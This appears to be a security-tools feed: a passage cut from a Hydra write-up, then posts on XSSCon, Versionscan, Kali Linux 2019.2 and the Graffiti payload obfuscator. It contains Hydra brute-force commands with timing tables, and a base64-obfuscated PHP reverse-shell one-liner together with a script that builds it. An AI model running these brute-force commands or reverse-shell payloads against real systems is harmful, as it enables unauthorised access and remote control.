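hydra -L logins.txt -P passwords.txt -o results.json -b jsonv1 ftp://localhost/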

JSON Schema
Here is an example of the JSON output. Notes on some of the fields:
  • errormessages - an array of zero or more strings that are normally printed to stderr at the end of Hydra's run. The text is very free form.
  • success - indication if Hydra ran correctly without error (NOT if passwords were detected). This parameter is either the JSON value true or false depending on completion.
  • quantityfound - How many username+password combinations were discovered.
  • jsonoutputversion - Version of the schema: 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra will make the second part of the version always two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output.
Version 1.00 example:
{
    "errormessages": [
        "[ERROR] Error Message of Something",
        "[ERROR] Another Message",
        "These are very free form"
    ],
    "generator": {
        "built": "2019-03-01 14:44:22",
        "commandline": "hydra -b jsonv1 -o results.json ... ...",
        "jsonoutputversion": "1.00",
        "server": "127.0.0.1",
        "service": "http-post-form",
        "software": "Hydra",
        "version": "v8.5"
    },
    "quantityfound": 2,
    "results": [
        {
            "host": "127.0.0.1",
            "login": "bill@example.com",
            "password": "bill",
            "port": 9999,
            "service": "http-post-form"
        },
        {
            "host": "127.0.0.1",
            "login": "joe@example.com",
            "password": "joe",
            "port": 9999,
            "service": "http-post-form"
        }
    ],
    "success": false
}

SPEED
Through the parallelizing feature, this password cracker tool can be very fast; however, it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher, the faster ;-) (but too high, and it disables the service)
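For example, raising the task count for an FTP attack (illustrative values):
hydra -t 32 -l admin -P passwords.txt ftp://192.168.0.1/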

STATISTICS
Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing 295 entries (294 invalid login attempts, 1 valid). Every test was run three times (only for "1 task" just once), and the average noted down.
                          P A R A L L E L    T A S K S
SERVICE     1      4      8     16     32     50     64    100    128
-------  -------------------------------------------------------------
telnet   23:20   5:58   2:58   1:34   1:05   0:33  0:45*  0:25*  0:55*
ftp      45:54  11:51   5:54   3:06   1:25   0:58   0:46   0:29   0:32
pop3     92:10  27:16  13:56   6:42   2:55   1:57   1:24   1:14   0:50
imap     31:05   7:41   3:51   1:58   1:01   0:39   0:32   0:25   0:21
(*) Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown...
guesses per task (rounded up):
          295     74     38     19     10      6      5      3      3
guesses possible per connect (depends on the server software and config):
telnet 4, ftp 6, pop3 1, imap 3


XSSCon - Simple XSS Scanner Tool


Powerful simple XSS scanner made with Python 3.7

Installing
Requirements:

  • BeautifulSoup4 (pip install bs4)

  • requests (pip install requests)

  • python 3.7

Commands:
    git clone https://github.com/menkrep1337/XSSCon
    cd XSSCon
    python3 xsscon.py --help

    Usage
    Basic usage:
    python3 xsscon.py -u http://testphp.vulnweb.com

    Advanced usage see help:
    python3 xsscon.py --help

    Roadmap

    v0.3B:
  • Added custom options (such as --proxy, --user-agent, etc.)
  • First launched

    v0.3B Patch:
  • Added support for form method GET


    Versionscan - A PHP Version Scanner For Reporting Possible Vulnerabilities


    Versionscan is a tool for evaluating your currently installed PHP version and checking it against known CVEs and the versions they were fixed in to report back potential issues.
    PLEASE NOTE: Work is still in progress to adapt the tool to linux distributions that backport security fixes. As of right now, this only reports back for the straight up version reported.

    Installation

    Using Composer
    {
        "require": {
            "psecio/versionscan": "dev-master"
        }
    }
    The only current dependency is the Symfony console.
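    Equivalently, assuming a standard Composer setup, the same dependency can be added from the command line:
    composer require psecio/versionscan:dev-master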

    Usage
    To run the scan against your current PHP version, use:
    bin/versionscan
    The script will check the PHP_VERSION for the current instance and generate the pass/fail results. The output looks similar to:
    Executing against version: 5.4.24
    +--------+---------------+------+------------------------------------------------------------------------------------------------------+
    | Status | CVE ID | Risk | Summary |
    +--------+---------------+------+------------------------------------------------------------------------------------------------------+
    | FAIL | CVE-2014-3597 | 6.8 | Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP before 5.4.32 ... |
    | FAIL | CVE-2014-3587 | 4.3 | Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in... |
    Results will be reported back colorized as well to easily show the pass/fail of the check.

    Parameters
    There are several parameters that can be given to the tool to configure its scans and results:

    PHP Version
    If you'd like to define a PHP version to check other than the one the script finds itself, you can use the php-version parameter:
    bin/versionscan scan --php-version=4.3.2

    Report Only Failures
    You can also tell the versionscan to only report back the failures and not the passing tests:
    bin/versionscan scan --fail-only

    Sorting results
    You can also sort the results either by the CVE ID or by severity (risk rating), with the sort parameter and either the "cve" or "risk" value:
    bin/versionscan scan --sort=risk

    Output formats
    By default versionscan will output information directly to the console in a human-readable result. You can also specify other output formats that may be easier to parse programmatically (like JSON). Use the --format option to change the output:
    vendor/bin/versionscan scan --php-version=5.5 --format=json
    Supported output formats are console, json, xml and html.
    The HTML output format requires an --output option of the directory to write the file:
    vendor/bin/versionscan scan --php-version=5.5 --format=html --output=/var/www/output
    The result will be written to a file named something like versionscan-output-20150808.html


    Kali Linux 2019.2 Release - Penetration Testing and Ethical Hacking Linux Distribution


    This release brings the kernel up to version 4.19.28, fixes numerous bugs, includes many updated packages, and most excitingly, features a new release of Kali Linux NetHunter!

    Kali NetHunter 2019.2 Release

    NetHunter now supports over 50 devices running all the latest Android versions, from KitKat through to Pie.

    13 new NetHunter images have been released for the latest Android versions of your favorite devices, including:
    • Nexus 6 running Pie
    • Nexus 6P, Oreo
    • OnePlus2, Pie
    • Galaxy Tab S4 LTE & WiFi, Oreo
    These and many more can be downloaded from the NetHunter page.

    Tool Upgrades

    This release largely features various tweaks and bug fixes but there are still many updated tools including seclists, msfpc, and exe2hex.
    For the complete list of updates, fixes, and additions, please refer to the Kali Bug Tracker Changelog.

    ARM Updates

    For the ARM users, be aware that the first boot will take a bit longer than usual, as it requires the reinstallation of a few packages on the hardware. This manifests as the login manager crashing a few times until the packages finish reinstalling and is expected behaviour.

    Upgrade to Kali Linux 2019.2

    If you already have a Kali installation you’re happy with, you can easily upgrade in place as follows.
    root@kali:~# apt update && apt -y full-upgrade

    Ensuring your Installation is Updated

    To double check your version, first make sure your Kali package repositories are correct.
    root@kali:~# cat /etc/apt/sources.list
    deb http://http.kali.org/kali kali-rolling main non-free contrib

    Then after running ‘apt -y full-upgrade’, you may require a ‘reboot’ before checking:
    root@kali:~# grep VERSION /etc/os-release
    VERSION="2019.2"
    VERSION_ID="2019.2"

    root@kali:~# uname -a
    Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux

    If you come across any bugs in Kali, please open a report on our bug tracker


    Graffiti - A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing


    NOTE: Never upload payloads to online checkers
    Graffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:
    • Python
    • Perl
    • Batch
    • Powershell
    • PHP
    • Bash
    Graffiti will also accept a language that is not currently on the list and store the oneliner into a database.

    Features
    Graffiti comes complete with a database into which each encoded payload is inserted, allowing end users to view already created payloads for future use. The payloads can be encoded using the following techniques (a minimal sketch of the base64 case follows this list):
    • Xor
    • Base64
    • Hex
    • ROT13
    • Raw
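As a minimal sketch of the base64 case (mirroring the sample output later in this section; the payload string and PHP wrapper are assumptions, not Graffiti's internal code):

# base64_sketch.py - illustrative only
import base64

# a hypothetical PHP reverse-shell one-liner to encode
php_payload = '$sock=fsockopen("127.0.0.1",9065);exec("/bin/sh -i <&3 >&3 2>&3");'
encoded = base64.b64encode(php_payload.encode()).decode()

# wrap the encoded payload the way the sample output does
print("php -r 'exec(base64_decode(\"%s\"));'" % encoded)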
    Some features of Graffiti include:
    • Terminal drop in access, with the ability to run external commands
    • Ability to create your own payload JSON files
    • Ability to view cached payloads inside of the database
    • Ability to run the database in memory for quick deletion
    • Terminal history and saving of terminal history
    • Auto tab completion inside of terminal
    • Ability to securely wipe the history files and database file
    • Multiple encoding techniques as mentioned above

    Usage
    Graffiti comes with a built-in terminal; when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and its own internal commands. In order to get help, you just have to type help or ?:
    [Graffiti ASCII art banner]
    v(0.1)

    no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
    root@graffiti:~/graffiti# ?

    Command Description
    --------- --------------
    help/? Show this help
    external List available external commands
    cached Display all payloads that are already in the database
    list/show List all available payloads
    search <phrase> Search for a specific payload
    use <payload> <coder> Use this payload and encode it using a specified coder
    info <payload> Get information on a specified payload
    check Check for updates
    history Display command history
    exit/quit Exit the terminal and running session
    encode <script-type> <coder> Encode a provided payload

    root@graffiti:~/graffiti# help

    Command Description
    --------- --------------
    help/? Show this help
    external List available external commands
    cached Display all payloads that are already in the database
    list/show List all available payloads
    search <phrase> Search for a specific payload
    use <payload> <coder> Use this payload and encode it using a specified coder
    info <payload> Get information on a specified payload
    check Check for updates
    history Display command history
    exit/quit Exit the terminal and running session
    encode <script-type> <coder> Encode a provided payload
    Graffiti also comes with command line arguments for when you need a payload encoded quickly:
    usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
    [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
    [-l]
    [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
    [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
    [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

    optional arguments:
    -h, --help show this help message and exit
    -c CODEC, --codec CODEC
    specify an encoding technique (*default=None)
    -p PAYLOAD, --payload PAYLOAD
    pass the path to a payload to use (*default=None)
    --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
    create a payload file and store it inside of
    ./etc/payloads (*default=None)
    -l, --list list all available payloads by path (*default=False)
    -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
    pass your own personal payload to use for the encoding
    (*default=None)
    -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
    pass a listening address to use for the payload (if
    needed) (*default=None)
    -lP LISTENING-PORT, --lport LISTENING-PORT
    pass a listening port to use for the payload (if
    needed) (*default=None)
    -u URL, --url URL pass a URL if needed by your payload (*default=None)
    -vC, --view-cached view the cached data already present inside of the
    database
    -H, --no-history do not store the command history (*default=True)
    -W, --wipe wipe the database and the history (*default=False)
    --memory initialize the database into memory instead of a .db
    file (*default=False)
    -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
    pass more external commands, this will allow them to
    be accessed inside of the terminal commands must be in
    your PATH (*default=None)
    Encoding a payload is as simple as this:
    root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
    Encoded Payload:
    --------------------------------------------------

    php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'

    --------------------------------------------------

    A demo of Graffiti can be found here:


    Installation
    On any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:
    ./install.sh
    This will install Graffiti into your system and allow you to run it from anywhere.

    Bugs and issues
    If you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!

